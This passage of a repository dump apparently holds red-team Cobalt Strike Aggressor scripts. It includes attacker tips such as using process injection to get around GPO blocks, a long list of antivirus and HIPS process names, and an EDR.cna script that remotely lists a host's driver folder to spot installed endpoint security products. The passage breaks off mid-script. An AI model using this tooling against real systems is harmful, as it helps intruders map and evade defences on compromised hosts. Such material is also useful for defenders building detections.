159 | blog2($1, "\t\cBcmd.exe and powershell.exe blocked by GPO? Find a process that's user owned and started on bootup for process injection to bypass that.");
160 | blog2($1, "\t\cBJust because you acquired initial access doesn't mean you stop doing recon. Network/Host Enumeration is always the most important part.");
161 | blog2($1, "\t\cBInvoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.");
162 | blog2($1, "\t\cBNeed a Temporary web server? Use Python! python -m SimpleHTTPServer [port]\n");
163 |
164 | }
165 |
166 | if ($2 ismatch 'Smile') {
167 | local('$smile');
168 | $smile = "\n";
169 | $smile .= "\t\c9░░░░░░░░░░░███████░░░░░░░░░░░\n";
170 | $smile .= "\t\c9░░░░░░░████░░░░░░░████░░░░░░░\n";
171 | $smile .= "\t\c9░░░░░██░░░░░░░░░░░░░░░██░░░░░\n";
172 | $smile .= "\t\c9░░░██░░░░░░░░░░░░░░░░░░░██░░░\n";
173 | $smile .= "\t\c9░░█░░░░░░░░░░░░░░░░░░░░░░░█░░\n";
174 | $smile .= "\t\c9░█░░████░░░░░░░░██████░░░░░█░\n";
175 | $smile .= "\t\c9█░░█░░░██░░░░░░█░░░░███░░░░░█\n";
176 | $smile .= "\t\c9█░█░░░░░░█░░░░░█░░░░░░░█░░░░█\n";
177 | $smile .= "\t\c9█░█████████░░░░█████████░░░░█\n";
178 | $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
179 | $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
180 | $smile .= "\t\c9█░░░████████████████████░░░░█\n";
181 | $smile .= "\t\c9░█░░░█▓▓▓▓▓▓▓▓█████▓▓▓█░░░░█░\n";
182 | $smile .= "\t\c9░█░░░░█▓▓▓▓▓██░░░░██▓██░░░░█░\n";
183 | $smile .= "\t\c9░░█░░░░██▓▓█░░░░░░░▒██░░░░█░░\n";
184 | $smile .= "\t\c9░░░██░░░░██░░░░░░▒██░░░░██░░░\n";
185 | $smile .= "\t\c9░░░░░██░░░░███████░░░░██░░░░░\n";
186 | $smile .= "\t\c9░░░░░░░███░░░░░░░░░███░░░░░░░\n";
187 | $smile .= "\t\c9░░░░░░░░░░█████████░░░░░░░░░░\n";
188 | blog($1, $smile);
189 | }
190 |
191 | if ($2 is $null) {
192 | berror($1, "\c4Need to specify additional syntax! Use the 'List' command for help");
193 | blog($1, "\cBSyntax Example: RedRepo Windows");
194 | }
195 |
196 | }
197 |
198 |
--------------------------------------------------------------------------------
/Logging/av_hips_executables.txt:
--------------------------------------------------------------------------------
1 | KeyPass.exe
2 | avgui.exe
3 | emet_agent.exe
4 | emet_service.exe
5 | firesvc.exe
6 | firetray.exe
7 | hipsvc.exe
8 | mfevtps.exe
9 | mcafeefire.exe
10 | scan32.exe
11 | shstat.exe
12 | tbmon.exe
13 | vstskmgr.exe
14 | engineserver.exe
15 | mfevtps.exe
16 | mfeann.exe
17 | mcscript.exe
18 | updaterui.exe
19 | udaterui.exe
20 | naprdmgr.exe
21 | frameworkservice.exe
22 | cleanup.exe
23 | cmdagent.exe
24 | frminst.exe
25 | mcscript_inuse.exe
26 | mctray.exe
27 | mcshield.exe
28 | AAWTray.exe
29 | Ad-Aware.exe
30 | MSASCui.exe
31 | _avp32.exe
32 | _avpcc.exe
33 | _avpm.exe
34 | aAvgApi.exe
35 | ackwin32.exe
36 | adaware.exe
37 | advxdwin.exe
38 | agentsvr.exe
39 | agentw.exe
40 | alertsvc.exe
41 | alevir.exe
42 | alogserv.exe
43 | amon9x.exe
44 | anti-trojan.exe
45 | antivirus.exe
46 | ants.exe
47 | apimonitor.exe
48 | aplica32.exe
49 | apvxdwin.exe
50 | arr.exe
51 | atcon.exe
52 | atguard.exe
53 | atro55en.exe
54 | atupdater.exe
55 | atwatch.exe
56 | au.exe
57 | aupdate.exe
58 | auto-protect.nav80try.exe
59 | autodown.exe
60 | autotrace.exe
61 | autoupdate.exe
62 | avconsol.exe
63 | ave32.exe
64 | avgcc32.exe
65 | avgctrl.exe
66 | avgemc.exe
67 | avgnt.exe
68 | avgrsx.exe
69 | avgserv.exe
70 | avgserv9.exe
71 | avguard.exe
72 | avgw.exe
73 | avkpop.exe
74 | avkserv.exe
75 | avkservice.exe
76 | avkwctl9.exe
77 | avltmain.exe
78 | avnt.exe
79 | avp.exe
80 | avp.exe
81 | avp32.exe
82 | avpcc.exe
83 | avpdos32.exe
84 | avpm.exe
85 | avptc32.exe
86 | avpupd.exe
87 | avsched32.exe
88 | avsynmgr.exe
89 | avwin.exe
90 | avwin95.exe
91 | avwinnt.exe
92 | avwupd.exe
93 | avwupd32.exe
94 | avwupsrv.exe
95 | avxmonitor9x.exe
96 | avxmonitornt.exe
97 | avxquar.exe
98 | backweb.exe
99 | bargains.exe
100 | bd_professional.exe
101 | beagle.exe
102 | belt.exe
103 | bidef.exe
104 | bidserver.exe
105 | bipcp.exe
106 | bipcpevalsetup.exe
107 | bisp.exe
108 | blackd.exe
109 | blackice.exe
110 | blink.exe
111 | blss.exe
112 | bootconf.exe
113 | bootwarn.exe
114 | borg2.exe
115 | bpc.exe
116 | brasil.exe
117 | bs120.exe
118 | bundle.exe
119 | bvt.exe
120 | ccapp.exe
121 | ccevtmgr.exe
122 | ccpxysvc.exe
123 | ccsvchst.exe
124 | ccSvcHst.exe
125 | cdp.exe
126 | cfd.exe
127 | cfgwiz.exe
128 | cfiadmin.exe
129 | cfiaudit.exe
130 | cfinet.exe
131 | cfinet32.exe
132 | claw95.exe
133 | claw95cf.exe
134 | clean.exe
135 | cleaner.exe
136 | cleaner3.exe
137 | cleanpc.exe
138 | click.exe
139 | cmesys.exe
140 | cmgrdian.exe
141 | cmon016.exe
142 | connectionmonitor.exe
143 | cpd.exe
144 | cpf9x206.exe
145 | cpfnt206.exe
146 | ctrl.exe
147 | cv.exe
148 | cwnb181.exe
149 | cwntdwmo.exe
150 | datemanager.exe
151 | dcomx.exe
152 | defalert.exe
153 | defscangui.exe
154 | defwatch.exe
155 | deputy.exe
156 | divx.exe
157 | dllcache.exe
158 | dllreg.exe
159 | doors.exe
160 | dpf.exe
161 | dpfsetup.exe
162 | dpps2.exe
163 | drwatson.exe
164 | drweb32.exe
165 | drwebupw.exe
166 | dssagent.exe
167 | dvp95.exe
168 | dvp95_0.exe
169 | ecengine.exe
170 | efpeadm.exe
171 | EMET_Agent.exe
172 | EMET_Service.exe
173 | emsw.exe
174 | ent.exe
175 | esafe.exe
176 | escanhnt.exe
177 | escanv95.exe
178 | espwatch.exe
179 | ethereal.exe
180 | etrustcipe.exe
181 | evpn.exe
182 | exantivirus-cnet.exe
183 | exe.avxw.exe
184 | expert.exe
185 | explore.exe
186 | f-agnt95.exe
187 | f-prot.exe
188 | f-prot95.exe
189 | f-stopw.exe
190 | fameh32.exe
191 | fast.exe
192 | fch32.exe
193 | fih32.exe
194 | findviru.exe
195 | firewall.exe
196 | fnrb32.exe
197 | fp-win.exe
198 | fp-win_trial.exe
199 | fprot.exe
200 | frw.exe
201 | fsaa.exe
202 | fsav.exe
203 | fsav32.exe
204 | fsav530stbyb.exe
205 | fsav530wtbyb.exe
206 | fsav95.exe
207 | fsgk32.exe
208 | fsm32.exe
209 | fsma32.exe
210 | fsmb32.exe
211 | gator.exe
212 | gbmenu.exe
213 | gbpoll.exe
214 | generics.exe
215 | gmt.exe
216 | guard.exe
217 | guarddog.exe
218 | hacktracersetup.exe
219 | hbinst.exe
220 | hbsrv.exe
221 | hotactio.exe
222 | hotpatch.exe
223 | htlog.exe
224 | htpatch.exe
225 | hwpe.exe
226 | hxdl.exe
227 | hxiul.exe
228 | iamapp.exe
229 | iamserv.exe
230 | iamstats.exe
231 | ibmasn.exe
232 | ibmavsp.exe
233 | icload95.exe
234 | icloadnt.exe
235 | icmon.exe
236 | icsupp95.exe
237 | icsuppnt.exe
238 | idle.exe
239 | iedll.exe
240 | iedriver.exe
241 | iface.exe
242 | ifw2000.exe
243 | inetlnfo.exe
244 | infus.exe
245 | infwin.exe
246 | init.exe
247 | intdel.exe
248 | intren.exe
249 | iomon98.exe
250 | istsvc.exe
251 | jammer.exe
252 | jdbgmrg.exe
253 | jedi.exe
254 | kavlite40eng.exe
255 | kavpers40eng.exe
256 | kavpf.exe
257 | kazza.exe
258 | keenvalue.exe
259 | kerio-pf-213-en-win.exe
260 | kerio-wrl-421-en-win.exe
261 | kerio-wrp-421-en-win.exe
262 | kernel32.exe
263 | killprocesssetup161.exe
264 | launcher.exe
265 | ldnetmon.exe
266 | ldpro.exe
267 | ldpromenu.exe
268 | ldscan.exe
269 | lnetinfo.exe
270 | loader.exe
271 | localnet.exe
272 | LockAppHost.exe
273 | LockApp.exe
274 | lockdown.exe
275 | lockdown2000.exe
276 | lookout.exe
277 | lordpe.exe
278 | lsetup.exe
279 | luall.exe
280 | luau.exe
281 | lucomserver.exe
282 | luinit.exe
283 | luspt.exe
284 | mapisvc32.exe
285 | mcagent.exe
286 | mcmnhdlr.exe
287 | mcshield.exe
288 | mctool.exe
289 | mcupdate.exe
290 | mcvsrte.exe
291 | mcvsshld.exe
292 | md.exe
293 | mfin32.exe
294 | mfw2en.exe
295 | mfweng3.02d30.exe
296 | mgavrtcl.exe
297 | mgavrte.exe
298 | mghtml.exe
299 | mgui.exe
300 | minilog.exe
301 | mmod.exe
302 | monitor.exe
303 | moolive.exe
304 | mostat.exe
305 | mpfagent.exe
306 | mpfservice.exe
307 | mpftray.exe
308 | mrflux.exe
309 | msapp.exe
310 | msbb.exe
311 | msblast.exe
312 | mscache.exe
313 | msccn32.exe
314 | mscman.exe
315 | msconfig.exe
316 | msdm.exe
317 | msdos.exe
318 | msiexec16.exe
319 | msinfo32.exe
320 | mslaugh.exe
321 | msmgt.exe
322 | msmsgri32.exe
323 | mssmmc32.exe
324 | mssys.exe
325 | msvxd.exe
326 | mu0311ad.exe
327 | mwatch.exe
328 | n32scanw.exe
329 | nav.exe
330 | navap.navapsvc.exe
331 | navapsvc.exe
332 | navapw32.exe
333 | navdx.exe
334 | navlu32.exe
335 | navnt.exe
336 | navstub.exe
337 | navw32.exe
338 | navwnt.exe
339 | nc2000.exe
340 | ncinst4.exe
341 | ndd32.exe
342 | neomonitor.exe
343 | neowatchlog.exe
344 | netarmor.exe
345 | netd32.exe
346 | netinfo.exe
347 | netmon.exe
348 | netscanpro.exe
349 | netspyhunter-1.2.exe
350 | netstat.exe
351 | netutils.exe
352 | nisserv.exe
353 | nisum.exe
354 | nmain.exe
355 | nod32.exe
356 | normist.exe
357 | norton_internet_secu_3.0_407.exe
358 | notstart.exe
359 | npf40_tw_98_nt_me_2k.exe
360 | npfmessenger.exe
361 | nprotect.exe
362 | npscheck.exe
363 | npssvc.exe
364 | nsched32.exe
365 | nssys32.exe
366 | nstask32.exe
367 | nsupdate.exe
368 | nt.exe
369 | ntrtscan.exe
370 | ntvdm.exe
371 | ntxconfig.exe
372 | nui.exe
373 | nupgrade.exe
374 | nvarch16.exe
375 | nvc95.exe
376 | nvsvc32.exe
377 | nwinst4.exe
378 | nwservice.exe
379 | nwtool16.exe
380 | ollydbg.exe
381 | onsrvr.exe
382 | optimize.exe
383 | ostronet.exe
384 | otfix.exe
385 | outpost.exe
386 | outpostinstall.exe
387 | outpostproinstall.exe
388 | padmin.exe
389 | panixk.exe
390 | patch.exe
391 | pavcl.exe
392 | pavproxy.exe
393 | pavsched.exe
394 | pavw.exe
395 | pccwin98.exe
396 | pcfwallicon.exe
397 | pcip10117_0.exe
398 | pcscan.exe
399 | pdsetup.exe
400 | periscope.exe
401 | persfw.exe
402 | perswf.exe
403 | pf2.exe
404 | pfwadmin.exe
405 | pgmonitr.exe
406 | pingscan.exe
407 | platin.exe
408 | pop3trap.exe
409 | poproxy.exe
410 | popscan.exe
411 | portdetective.exe
412 | portmonitor.exe
413 | powerscan.exe
414 | ppinupdt.exe
415 | pptbc.exe
416 | ppvstop.exe
417 | prizesurfer.exe
418 | prmt.exe
419 | prmvr.exe
420 | procdump.exe
421 | processmonitor.exe
422 | procexplorerv1.0.exe
423 | programauditor.exe
424 | proport.exe
425 | protectx.exe
426 | pspf.exe
427 | purge.exe
428 | qconsole.exe
429 | qserver.exe
430 | rapapp.exe
431 | rav7.exe
432 | rav7win.exe
433 | rav8win32eng.exe
434 | ray.exe
435 | rb32.exe
436 | rcsync.exe
437 | realmon.exe
438 | reged.exe
439 | regedit.exe
440 | regedt32.exe
441 | rescue.exe
442 | rescue32.exe
443 | rrguard.exe
444 | rshell.exe
445 | rtvscan.exe
446 | rtvscn95.exe
447 | rulaunch.exe
448 | run32dll.exe
449 | rundll.exe
450 | rundll16.exe
451 | ruxdll32.exe
452 | safeweb.exe
453 | sahagent.exescan32.exe
454 | shstat.exe
455 | tbmon.exe
456 | vstskmgr.exe
457 | engineserver.exe
458 | mfevtps.exe
459 | mfeann.exe
460 | mcscript.exe
461 | updaterui.exe
462 | udaterui.exe
463 | naprdmgr.exe
464 | frameworkservice.exe
465 | cleanup.exe
466 | cmdagent.exe
467 | frminst.exe
468 | mcscript_inuse.exe
469 | mctray.exe
470 | mcshield.exe
471 | save.exe
472 | savenow.exe
473 | sbserv.exe
474 | sc.exe
475 | scam32.exe
476 | scan32.exe
477 | scan95.exe
478 | scanpm.exe
479 | scrscan.exe
480 | serv95.exe
481 | setup_flowprotector_us.exe
482 | setupvameeval.exe
483 | sfc.exe
484 | sgssfw32.exe
485 | sh.exe
486 | shellspyinstall.exe
487 | shn.exe
488 | showbehind.exe
489 | smc.exe
490 | Smc.exe
491 | SmcGui.exe
492 | sms.exe
493 | smss32.exe
494 | SymCorpUI.exe
495 | soap.exe
496 | sofi.exe
497 | sperm.exe
498 | spf.exe
499 | sphinx.exe
500 | spoler.exe
501 | spoolcv.exe
502 | spoolsv32.exe
503 | spyxx.exe
504 | srexe.exe
505 | srng.exe
506 | ss3edit.exe
507 | ssg_4104.exe
508 | ssgrate.exe
509 | st2.exe
510 | start.exe
511 | stcloader.exe
512 | supftrl.exe
513 | support.exe
514 | supporter5.exe
515 | svchostc.exe
516 | svchosts.exe
517 | sweep95.exe
518 | sweepnet.sweepsrv.sys.swnetsup.exe
519 | symproxysvc.exe
520 | symtray.exe
521 | sysedit.exe
522 | sysupd.exe
523 | taskmg.exe
524 | taskmo.exe
525 | taumon.exe
526 | tbscan.exe
527 | tc.exe
528 | tca.exe
529 | tcm.exe
530 | tds-3.exe
531 | tds2-98.exe
532 | tds2-nt.exe
533 | teekids.exe
534 | tfak.exe
535 | tfak5.exe
536 | tgbob.exe
537 | titanin.exe
538 | titaninxp.exe
539 | tracert.exe
540 | trickler.exe
541 | trjscan.exe
542 | trjsetup.exe
543 | trojantrap3.exe
544 | tsadbot.exe
545 | tvmd.exe
546 | tvtmd.exe
547 | undoboot.exe
548 | updat.exe
549 | update.exe
550 | upgrad.exe
551 | utpost.exe
552 | vbcmserv.exe
553 | vbcons.exe
554 | vbust.exe
555 | vbwin9x.exe
556 | vbwinntw.exe
557 | vcsetup.exe
558 | vet32.exe
559 | vet95.exe
560 | vettray.exe
561 | vfsetup.exe
562 | vir-help.exe
563 | virusmdpersonalfirewall.exe
564 | vnlan300.exe
565 | vnpc3000.exe
566 | vpc32.exe
567 | vpc42.exe
568 | vpfw30s.exe
569 | vptray.exe
570 | vscan40.exe
571 | vscenu6.02d30.exe
572 | vsched.exe
573 | vsecomr.exe
574 | vshwin32.exe
575 | vsisetup.exe
576 | vsmain.exe
577 | vsmon.exe
578 | vsstat.exe
579 | vswin9xe.exe
580 | vswinntse.exe
581 | vswinperse.exe
582 | w32dsm89.exe
583 | w9x.exe
584 | watchdog.exe
585 | webdav.exe
586 | webscanx.exe
587 | webtrap.exe
588 | wfindv32.exe
589 | whoswatchingme.exe
590 | wimmun32.exe
591 | win-bugsfix.exe
592 | win32.exe
593 | win32us.exe
594 | winactive.exe
595 | window.exe
596 | windows.exe
597 | wininetd.exe
598 | wininitx.exe
599 | winlogin.exe
600 | winmain.exe
601 | winnet.exe
602 | winppr32.exe
603 | winrecon.exe
604 | winservn.exe
605 | winssk32.exe
606 | winstart.exe
607 | winstart001.exe
608 | wintsk32.exe
609 | winupdate.exe
610 | wkufind.exe
611 | wnad.exe
612 | wnt.exe
613 | wradmin.exe
614 | wrctrl.exe
615 | wsbgate.exe
616 | wupdater.exe
617 | wupdt.exe
618 | wyvernworksfirewall.exe
619 | xpf202en.exe
620 | zapro.exe
621 | zapsetup3001.exe
622 | zatutor.exe
623 | zonalm2601.exe
624 | zonealarm.exe
625 |
--------------------------------------------------------------------------------
/EDR.cna:
--------------------------------------------------------------------------------
1 | ## EDR.cna
2 | ## Author: @r3dqu1nn
3 | ## Remotely query a system for EDR products
4 | ## Additions made by @_bin_Ash
5 |
6 | ## List of EDR drivers
7 | @edr = @("psepfilter.sys", "cbfsfilter2017.sys", "cve.sys", "atrsdfw.sys", "naswSP.sys", "aswSP.sys", "avgtpx86.sys", "avgtpx64.sys", "edrsensor.sys", "hbflt.sys", "bdsvm.sys", "gzflt.sys", "bddevflt.sys", "AVCKF.SYS", "Atc.sys", "AVC3.SYS", "TRUFOS.SYS", "BDSandBox.sys", "brfilter.sys", "BrCow_x_x_x_x.sys", "bemk.sys", "CarbonBlackK.sys", "parity.sys", "cbstream.sys", "cbk7.sys", "ctifile.sys", "epregflt.sys", "medlpflt.sys", "dsfa.sys", "cposfw.sys", "CiscoAMPCEFWDriver.sys", "CiscoAMPHeurDriver.sys", "cb", "csaenh.sys", "csareg.sys", "csascr.sys", "csaav.sys", "csaam.sys", "csacentr.sys", "rvsavd.sys", "cfrmd.sys", "cmdccav.sys", "cmdguard.sys", "CmdMnEfs.sys", "MyDLPMF.sys", "im.sys", "CSDeviceControl.sys", "csagent.sys", "CSBoot.sys", "cspcm2.sys", "CybKernelTracker.sys", "CRExecPrev.sys", "CyOptics.sys", "CyProtectDrv32.sys", "CyProtectDrv64.sys.sys", "CyProtectDrv64.sys", "groundling32.sys", "groundling64.sys", "ElasticEndpoint.sys", "ElasticEndpointDriver.sys", "esensor.sys", "edevmon.sys", "ehdrv.sys", "FeKern.sys", "WFP_MRT.sys", "xfsgk.sys", "fsatp.sys", "fshs.sys", "fsgk.sys", "HexisFSMonitor.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "LRAgentMF.sys", "mbamwatchdog.sys", "mfeaskm.sys", "mfencfilter.sys", "epdrv.sys", "mfencoas.sys", "mfehidk.sys", "swin.sys", "hdlpflt.sys", "mfprom.sys", "MfeEEFF.sys", "libwamf.sys", "telam.sys", "PSINPROC.SYS", "PSINFILE.SYS", "amfsm.sys", "amm8660.sys", "amm6460.sys", "eaw.sys", "SAFE-Agent.sys", "SentinelMonitor.sys", "SAVOnAccess.sys", "sld.sys", "SophosED.sys", "sntp.sys", "swi_callout.sys", "hmpalert.sys", "sdcfilter.sys", "SophosBootDriver.sys", "pgpwdefs.sys", "GEProtection.sys", "diflt.sys", "sysMon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys", "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter", "symevent.sys", "vxfsrep.sys", "VirtFile.sys", "SymAFR.sys", "symefasi.sys", "symefa.sys", "symefa64.sys", "SymHsm.sys", "evmf.sys", "GEFCMP.sys", "VFSEnc.sys", "pgpfs.sys", "fencry.sys", "symrg.sys", "SISIPSFileFilter.sys", "TMUMS.sys", "hfileflt.sys", "TMUMH.sys", "AcDriver.sys", "SakFile.sys", "SakMFile.sys", "fileflt.sys", "TmEsFlt.sys", "tmevtmgr.sys", "TmFileEncDmk.sys", "ndgdmk.sys", "dgdmk.sys", "ssfmonm.sys");
8 |
9 |
10 | ## edr_query Command Register
11 | beacon_command_register("edr_query", "Queries the remote or local system for all major EDR products installed",
12 | "Syntax: edr_query [hostname] [arch]\n" .
13 | "Checks the local or remote system for installed EDR products. **Note: Use localhost for [hostname] to query the local system**");
14 |
15 | ## edr_query alias
16 | alias edr_query {
17 | $bid = $1;
18 | if ($2 is $null) {
19 | blog($bid, "\c4Please enter a remote hostname or localhost!");
20 | show_message("Please enter a remote hostname or localhost!");
21 | }
22 | else if ($3 is $null) {
23 | blog($bid, "\c4Please enter a valid architechture!");
24 | show_message("Please enter a valid architechture!");
25 | }
26 | else if ($3 ismatch 'x64') {
27 | blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
28 | bls($bid, "\\\\". $2 ."\\C\$\\windows\\system32\\drivers", &list);
29 | }
30 | else if ($3 ismatch 'x86') {
31 | blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
32 | bls($bid, "\\\\". $2 ."\\C\$\\windows\\sysnative\\drivers", &list);
33 | }
34 | }
35 |
36 | sub query {
37 |
38 | $bid = $1;
39 | $dialog = dialog("EDR Query Menu", %(hostname => "Enter Remote HostName", Arch => ""), &EDR);
40 | dialog_description($dialog, "EDR Query Menu. Remotely query a system for EDR products. Hostname field (IP or Hostname) is Mandatory! **Note: Use localhost for the local system.**");
41 | drow_text($dialog, "hostname", "Target HostName:");
42 | drow_combobox($dialog, "Arch", "Target Architechture:", @("x86", "x64"));
43 | dbutton_action($dialog, "Execute");
44 | dialog_show($dialog);
45 |
46 | }
47 |
48 | sub EDR {
49 |
50 | if ($3['hostname'] ismatch 'Enter Remote HostName') {
51 | show_message("Please enter a remote hostname or localhost!");
52 | blog($bid, "\c4Please enter a remote hostname or localhost!");
53 | }
54 | else if ($3['Arch'] ismatch 'x86') {
55 | bls($bid, "\\\\". $3['hostname'] ."\\C\$\\windows\\sysnative\\drivers", &list);
56 | blog($bid, "\cBDetermining what EDR products are installed on ". $3['hostname']. "...");
57 | }
58 | else if ($3['Arch'] ismatch 'x64') {
59 | bls($bid, "\\\\". $3['hostname'] ."\\C\$\\windows\\system32\\drivers", &list);
60 | blog($bid, "\cBDetermining what EDR products are installed on ". $3['hostname']. "...");
61 | }
62 |
63 | }
64 |
65 | #Parse dem results
66 | sub list {
67 |
68 | local('$entry $type $size $modified $name $out');
69 | @results = split("\n", ["$3" trim]);
70 | @matches = @();
71 | foreach $entry (@results) {
72 | ($type, $size, $modified, $name) = split("\t", $entry);
73 | if ($name in @edr) {
74 | blog($bid, "\cB$name Found");
75 | add(@matches, $name, 0);
76 | }
77 | }
78 |
79 | $size = size(@matches);
80 |
81 | ## Print banner
82 | $out .= "\c4$size EDR Products Found!\n";
83 | $out .= " \c0======================\n";
84 | $out .= " | Vendor Information | \n";
85 | $out .= "\c0 ----------------------";
86 |
87 | ## Initial error checking
88 | if (size(@matches) == 0) {
89 | blog($bid, "\c9No EDR products found! Operate at your own risk!");
90 | clear(@matches);
91 | }
92 | if (size(@matches) > 0) {
93 | blog($bid, $out);
94 | }
95 |
96 | ## Driver checking
97 |
98 | ### Absolute
99 | if ('psepfilter.sys' in @matches || 'cve.sys' in @matches || 'cbfsfilter2017.sys' in @matches) {
100 | blog($bid, "Absolute Found!");
101 | }
102 |
103 | ### Altiris (Symantec)
104 | if ('atrsdfw.sys' in @matches) {
105 | blog($bid, "Altiris (Symantec) Found!");
106 | }
107 |
108 | ### Avast
109 | if ('aswSP.sys' in @matches || 'naswSP.sys' in @matches) {
110 | blog($bid, "Avast Found!");
111 | }
112 |
113 | ### AVG Technologies
114 | if ('avgtpx86.sys' in @matches || 'avgtpx64.sys' in @matches) {
115 | blog($bid, "AVG Technologies Found!");
116 | }
117 |
118 | ## BitDefender
119 | if ('edrsensor.sys' in @matches || 'hbflt.sys' in @matches || 'bdsvm.sys' in @matches || 'gzflt.sys' in @matches || 'bddevflt.sys' in @matches || 'AVCKF.SYS' in @matches || 'Atc.sys' in @matches || 'AVC3.SYS' in @matches || 'TRUFOS.SYS' in @matches || 'BDSandBox.sys' in @matches) {
120 | blog($bid, "BitDefender Found!");
121 | }
122 |
123 | ## Bromium
124 | if ('brfilter.sys' in @matches || 'BrCow_x_x_x_x.sys' in @matches || 'bemk.sys' in @matches) {
125 | blog($bid, "Bromium Found!");
126 | }
127 |
128 | ### Carbon Black
129 | if ('CarbonBlackK.sys' in @matches || 'carbonblackk.sys' in @matches || "Parity.sys" in @matches || "cbk7.sys" in @matches || "cbstream.sys" in @matches || "ctifile.sys" in @matches) {
130 | blog($bid, "Carbon Black Found!");
131 | }
132 |
133 | ### Check Point Software Technologies
134 | if ('epregflt.sys' in @matches || 'medlpflt.sys' in @matches || 'dsfa.sys' in @matches || 'cposfw.sys' in @matches || 'epklib.sys' in @matches) {
135 | blog($bid, "Check Point Software Technologies Found!");
136 | }
137 |
138 | ### Cisco AMP
139 | if ('CiscoAMPCEFWDriver.sys' in @matches || 'CiscoAMPHeurDriver.sys' in @matches) {
140 | blog($bid, "Cisco AMP Found!")
141 | }
142 |
143 | ### Cisco Secure Endpoint
144 | if ('csacentr.sys' in @matches || 'csaenh.sys' in @matches || 'csareg.sys' in @matches || 'csascr.sys' in @matches || 'csaav.sys' in @matches || 'csaam.sys' in @matches) {
145 | blog($bid, "Cisco Found!");
146 | }
147 |
148 | ### CJSC Returnil Software
149 | if ('rvsavd.sys' in @matches) {
150 | blog($bid, "CJSC Returnil Software Found!");
151 | }
152 |
153 | ### Comodo Security Solutions
154 | if ('cfrmd.sys' in @matches || 'cmdccav.sys' in @matches || 'cmdguard.sys' in @matches || 'CmdMnEfs.sys' in @matches || 'MyDLPMF.sys' in @matches) {
155 | blog($bid, "Comodo Security Solutions Found!");
156 | }
157 |
158 | ### CrowdStrike
159 | if ('im.sys' in @matches || 'CSAgent.sys' in @matches || 'CSBoot.sys' in @matches || 'CSDeviceControl.sys' in @matches || 'cspcm2.sys' in @matches) {
160 | blog($bid, "CrowdStrike Found!");
161 | }
162 |
163 | ### CyberArk
164 | if ('CybKernelTracker.sys' in @matches || 'vfdrv.sys' in @matches || 'vfnet.sys' in @matches || 'vfpd.sys' in @matches ) {
165 | blog($bid, "CyberArk Software Found!");
166 | }
167 |
168 | ### Cybereason
169 | if ('CRExecPrev.sys' in @matches) {
170 | blog($bid, "Cybereason Found!");
171 | }
172 |
173 | ### Cylance Inc.
174 | if ('CyOptics.sys' in @matches || 'CyProtectDrv32.sys' in @matches || 'CyProtectDrv64.sys' in @matches) {
175 | blog($bid, "Cylance Inc. Found!");
176 | }
177 |
178 | ### Dell Secureworks
179 | if ('groundling32.sys' in @matches || 'groundling64.sys' in @matches) {
180 | blog($bid, "Dell Secureworks Found!");
181 | }
182 |
183 | ### Elastic Security for Endpoint
184 | if ('ElasticEndpoint.sys' in @matches || 'ElasticEndpointDriver.sys' in @matches) {
185 | blog($bid, "Elastic Security for Endpoint detected!")
186 | }
187 |
188 | ### Endgame
189 | if ('esensor.sys' in @matches) {
190 | blog($bid, "Endgame Found!");
191 | }
192 |
193 | ### ESET
194 | if ('edevmon.sys' in @matches || 'ehdrv.sys' in @matches || 'eamonm.sys' in @matches || 'ekbdflt.sys' in @matches) {
195 | blog($bid, "ESET Found!");
196 | }
197 |
198 | ### FireEye
199 | if ('FeKern.sys' in @matches || 'WFP_MRT.sys' in @matches) {
200 | blog($bid, "FireEye Found!");
201 | }
202 |
203 | ### F-Secure
204 | if ('xfsgk.sys' in @matches || 'fsgk.sys' in @matches || 'fsatp.sys' in @matches || 'fshs.sys' in @matches) {
205 | blog($bid, "F-Secure Found!");
206 | }
207 |
208 | ### Heix Cyber Solutions
209 | if ('HexisFSMonitor.sys' in @matches) {
210 | blog($bid, "Hexis Cyber Solutions Found!");
211 | }
212 |
213 | ### Kaspersky
214 | if ('klifks.sys' in @matches || 'klifaa.sys' in @matches || 'Klifsm.sys' in @matches) {
215 | blog($bid, "Kaspersky Found!");
216 | }
217 |
218 | ### LogRhythm
219 | if ('LRAgentMF.sys' in @matches) {
220 | blog($bid, "LogRhythm Found!");
221 | }
222 |
223 | ### Malwarebytes
224 | if ('mbamwatchdog.sys' in @matches) {
225 | blog($bid, "Malwarebytes Found!");
226 | }
227 |
228 | ### McAfee
229 | if ('mfeaskm.sys' in @matches || 'mfencfilter.sys' in @matches || 'epdrv.sys' in @matches || 'mfencoas.sys' in @matches || 'mfehidk.sys' in @matches || 'swin.sys' in @matches || 'hdlpflt.sys' in @matches || 'mfprom.sys' in @matches || 'MfeEEFF.sys' in @matches) {
230 | blog($bid, "McAfee Found!");
231 | }
232 |
233 | ### OPSWAT Inc
234 | if ('libwamf.sys' in @matches) {
235 | blog($bid, "OPSWAT Inc Found!");
236 | }
237 |
238 | ### Palo Alto
239 | if ('telam.sys' in @matches) {
240 | blog($bid, "Palo Alto Cortex Found!");
241 | }
242 |
243 | ### Panda Security
244 | if ('PSINPROC.SYS' in @matches || 'PSINFILE.SYS' in @matches || 'amfsm.sys' in @matches || 'amm8660.sys' in @matches || 'amm6460.sys' in @matches) {
245 | blog($bid, "Panda Security Found!");
246 | }
247 |
248 | ### Raytheon Cyber Solutions
249 | if ('eaw.sys' in @matches) {
250 | blog($bid, "Raytheon Cyber Solutions Found!");
251 | }
252 |
253 | ### SAFE-Cyberdefense
254 | if ('SAFE-Agent.sys' in @matches) {
255 | blog($bid, "SAFE-Cyberdefense Found!");
256 | }
257 |
258 | ### SentinelOne
259 | if ('SentinelMonitor.sys' in @matches) {
260 | blog($bid, "SentinelOne Found!");
261 | }
262 |
263 | ### Sophos
264 | if ('SAVOnAccess.sys' in @matches || 'savonaccess.sys' in @matches || 'sld.sys' in @matches || 'SophosED.sys' in @matches || 'sntp.sys' in @matches || 'swi_callout.sys' in @matches || 'hmpalert.sys' in @matches || 'sdcfilter.sys' in @matches || 'SophosBootDriver.sys' in @matches) {
265 | blog($bid, "Sophos Found!");
266 | }
267 |
268 | ### Symantec
